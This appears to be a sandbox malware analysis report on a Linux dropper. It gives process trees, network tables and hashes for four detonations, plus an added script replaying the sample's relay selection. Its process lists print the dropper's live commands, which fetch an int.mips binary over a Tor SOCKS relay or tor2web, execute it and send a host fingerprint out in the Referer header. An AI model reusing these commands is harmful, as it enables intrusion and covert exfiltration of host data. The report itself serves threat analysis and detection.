Malware Analysis Report

2025-05-06 04:16

Sample ID 241024-wpnxwazhjd
Target 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
SHA256 d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
Tags
defense_evasion discovery antivm
score
7/10

Analysis Overview

Threat Level: Shows suspicious behavior

The file 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118 was classified as "shows suspicious behavior" (score 7/10).

Malicious Activity Summary

Tags: defense_evasion discovery antivm

Triggered signatures:

File and Directory Permissions Modification

Executes dropped EXE

Looks up external IP address via web service

Deobfuscate/Decode Files or Information

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

Behaviour reconstructed from the process trees of the four detonations (every command quoted here appears verbatim in the Processes lists below):

Stage 1 dropper. The sample starts bash, decodes an embedded payload with "base64 -d", writes the result to /tmp/i, marks it executable ("chmod +x ./i"), runs it ("./i") and deletes it ("rm -f i"). /tmp/i carries the same hashes in all four runs (SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031).

Privilege and environment checks. Before that it runs "id -u", "grep x:0: /etc/passwd" and "cut -d: -f6" (field 6 of a passwd entry is the home directory), then "head -n 1 /tmp/.X11-unix/01" followed by "ls /proc//status". The empty path component in the ls argument shows that the value read from that file was empty; the sequence is consistent with a PID file used as a single-instance lock, kept under a name that imitates the X11 socket directory.

Relay discovery. The script resolves relay.tor2socks.in over DNS-over-HTTPS ("curl -4fsSLkA- -m200 https://<resolver>/dns-query?name=relay.tor2socks.in"; -k disables certificate verification, -A- replaces curl's default User-Agent, -m200 caps the request at 200 s), using a different resolver on each pass: doh-fi.blahdns.com, dns.digitale-gesellschaft.ch, doh.no.ahadns.net, dns.twnic.tw and uncensored.lux1.dns.nixnet.xyz. It extracts every dotted quad from the answer ("grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b"), discards any containing ".0" ("grep -Ev [.]0") and picks one at random ("sort -uR | head -n 1"). Only the resolver hostnames appear in conventional DNS (the 1.1.1.1:53 rows in the Network tables); relay.tor2socks.in itself never does.

Host fingerprint. The external IP is fetched from checkip.amazonaws.com; whoami, uname -m, uname -n, "ip a | grep inet" and "crontab -l" are collected, with md5sum, awk and "base64 -w0" applied to parts of the output.

Stage 2 download (mipsbe and mipsel runs only). "curl -4fsSLkA- -m200 -x socks5h://<relay>:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o ./<32 hex characters> -e <fingerprint>", with "ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips" tried next when the proxied request fails. The -e value is sent as the HTTP Referer and carries the fingerprint; read against the command sequence its fields are <external IP>_<user>_<uname -m>_<hostname>_<md5>_, e.g. 138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_. The digest d41d8cd98f00b204e9800998ecf8427e seen in most attempts is the MD5 of empty input, so the hashed data was empty on those attempts. The download target is then chmod +x'ed, executed and removed; one instance runs it from /dev/shm instead of /tmp.

Failure handling. When the relay lookup yields nothing, the proxy argument collapses to "socks5h://:9050" (empty host) and the script falls through to the tor2web gateway, then repeats the whole loop with another DoH resolver. The mipsbe run obtained a relay (65.108.216.128:9050) on its second pass, the mipsel run (5.10.228.248:9050) on its fourth. The Files sections list only /tmp/i; no second-stage file is recorded in any run. The amd64 and armhf runs stopped after the external-IP lookup.

Caveat on the antivm tag. "Checks CPU configuration" fired on /usr/bin/curl reading /proc/cpuinfo (behavioral2), and most "Reads runtime system information" rows are curl and awk opening /proc/sys/crypto/fips_enabled, /proc/self/auxv and /proc/self/maps. These reads belong to the system utilities the dropper invokes, not to the dropped payload, so they are weak evidence of sandbox evasion by the sample itself.

MITRE ATT&CK

Enterprise Matrix V15. The technique table itself is absent from this copy of the report. The tags (defense_evasion, discovery) are ATT&CK tactic names, and three of the signature names are ATT&CK technique names: File and Directory Permissions Modification (T1222), Deobfuscate/Decode Files or Information (T1140) and System Network Configuration Discovery (T1016).

Analysis: static1

Detonation Overview

Reported

2024-10-24 18:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:09

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/bin/grep

[grep -Ev [.]0]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/md5sum

[md5sum]

/bin/date

[date]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]
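
The relay-selection pipeline in the process list above (grep -oE over the DoH answer for relay.tor2socks.in, grep -Ev [.]0, sort -uR, head -n 1) is replayed below on constructed DoH responses. This is an added example written for this page, not code from the sample or from the sandbox. The JSON answers and the addresses in them (documentation ranges) are constructed; the resolver output is assumed to have the usual application/dns-json shape; the "tr \n" whose quoting was lost in the listing is taken to be tr '\n' ' '; and proxy_url reproduces the -x socks5h://<relay>:9050 form seen in the mips runs.

```shell
#!/bin/sh
# Added example for this report, not the sample's own code: replays the
# dropper's relay-selection pipeline on constructed DoH answers.
# Assumptions: the DoH resolver returns application/dns-json; the report's
# "[tr \n]" (quoting lost in the listing) is tr '\n' ' '; proxy_url mirrors
# the -x socks5h://<relay>:9050 argument seen in the mips runs.

# Constructed answer with three A records (documentation ranges, not real relays).
DOH_ANSWER_OK='{"Status":0,"Question":[{"name":"relay.tor2socks.in.","type":1}],"Answer":[{"name":"relay.tor2socks.in.","type":1,"TTL":300,"data":"203.0.113.7"},{"name":"relay.tor2socks.in.","type":1,"TTL":300,"data":"198.51.100.9"},{"name":"relay.tor2socks.in.","type":1,"TTL":300,"data":"192.0.2.0"}]}'

# Constructed NXDOMAIN-style answer: no Answer section at all.
DOH_ANSWER_EMPTY='{"Status":3,"Question":[{"name":"relay.tor2socks.in.","type":1}]}'

# The sample's pipeline as listed under Processes:
#   join lines -> every dotted quad -> drop any containing ".0"
#   -> unique, shuffled -> first line.
# With several survivors, sort -R makes the choice random on every run.
pick_relay() {
    tr '\n' ' ' \
    | grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' \
    | grep -Ev '[.]0' \
    | sort -uR \
    | head -n 1
}

# Proxy argument as the sample passes it to curl; an empty relay collapses
# to "socks5h://:9050", the form seen in the failed attempts.
proxy_url() {
    printf 'socks5h://%s:9050\n' "$1"
}

main() {
    relay=$(printf '%s' "$DOH_ANSWER_OK" | pick_relay)
    printf 'populated answer: relay=%s proxy=%s\n' "$relay" "$(proxy_url "$relay")"
    relay=$(printf '%s' "$DOH_ANSWER_EMPTY" | pick_relay)
    printf 'empty answer:     relay=%s proxy=%s\n' "'$relay'" "$(proxy_url "$relay")"
}

main
```

Two things the replay makes visible. The [.]0 filter drops every address with a zero octet after a dot, so 203.0.113.7 is discarded along with 192.0.2.0 and only 198.51.100.9 survives. An answer with no A records yields an empty relay, and the proxy argument then degrades to socks5h://:9050, which matches the first attempts in the mipsbe and mipsel runs.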

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 doh-fi.blahdns.com udp
US 1.1.1.1:53 checkip.amazonaws.com udp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.6:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:09

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

15s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/usr/bin/base64

[base64 -d]

/bin/bash

[bash]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://dns.digitale-gesellschaft.ch/dns-query?name=relay.tor2socks.in]

/usr/bin/sort

[sort -uR]

/bin/grep

[grep -Ev [.]0]

/usr/bin/head

[head -n 1]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

Network

Country Destination Domain Proto
US 1.1.1.1:53 dns.digitale-gesellschaft.ch udp
CH 185.95.218.42:443 dns.digitale-gesellschaft.ch tcp
US 1.1.1.1:53 checkip.amazonaws.com udp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:13

Platform

debian9-mipsbe-20240611-en

Max time kernel

87s

Max time network

155s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/bin/grep

[grep -Ev [.]0]

/usr/bin/head

[head -n 1]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $2}]

/usr/bin/base64

[base64 -w0]

/usr/bin/crontab

[crontab -l]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]

/bin/chmod

[chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]

/tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222

[./e8eb0a2cdf54c3ac6d6c2fd3f5796222]

/bin/rm

[rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]

/bin/grep

[grep -Ev [.]0]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $2}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_]

Network

Country Destination Domain Proto
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 34.254.128.37:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 dns.twnic.tw udp
TW 101.101.101.101:443 dns.twnic.tw tcp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 34.254.128.37:80 checkip.amazonaws.com tcp
FI 65.108.216.128:9050 tcp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:13

Platform

debian9-mipsel-20240226-en

Max time kernel

124s

Max time network

138s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/bin/grep

[grep -Ev [.]0]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $1}]

/sbin/ip

[ip a]

/usr/bin/awk

[awk {print $2}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/bin/chmod

[chmod +x ./3d4e2c62a0f0444c5e39a768425ab056]

/tmp/3d4e2c62a0f0444c5e39a768425ab056

[./3d4e2c62a0f0444c5e39a768425ab056]

/bin/rm

[rm -f ./3d4e2c62a0f0444c5e39a768425ab056]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]

/usr/bin/head

[head -n 1]

/bin/grep

[grep -Ev [.]0]

/bin/uname

[uname -m]

/usr/bin/cut

[cut -f1 -d-]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $2}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/base64

[base64 -w0]

/usr/bin/crontab

[crontab -l]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/bin/chmod

[chmod +x ./b18c7b90793d1614c38108eb109f833e]

/tmp/b18c7b90793d1614c38108eb109f833e

[./b18c7b90793d1614c38108eb109f833e]

/bin/rm

[rm -f ./b18c7b90793d1614c38108eb109f833e]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/bin/grep

[grep -Ev [.]0]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://uncensored.lux1.dns.nixnet.xyz/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/awk

[awk {print $2}]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $1}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/bin/chmod

[chmod +x ./5f3b49ef027eb052018f97a43d59ca89]

/dev/shm/5f3b49ef027eb052018f97a43d59ca89

[./5f3b49ef027eb052018f97a43d59ca89]

/bin/rm

[rm -f ./5f3b49ef027eb052018f97a43d59ca89]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

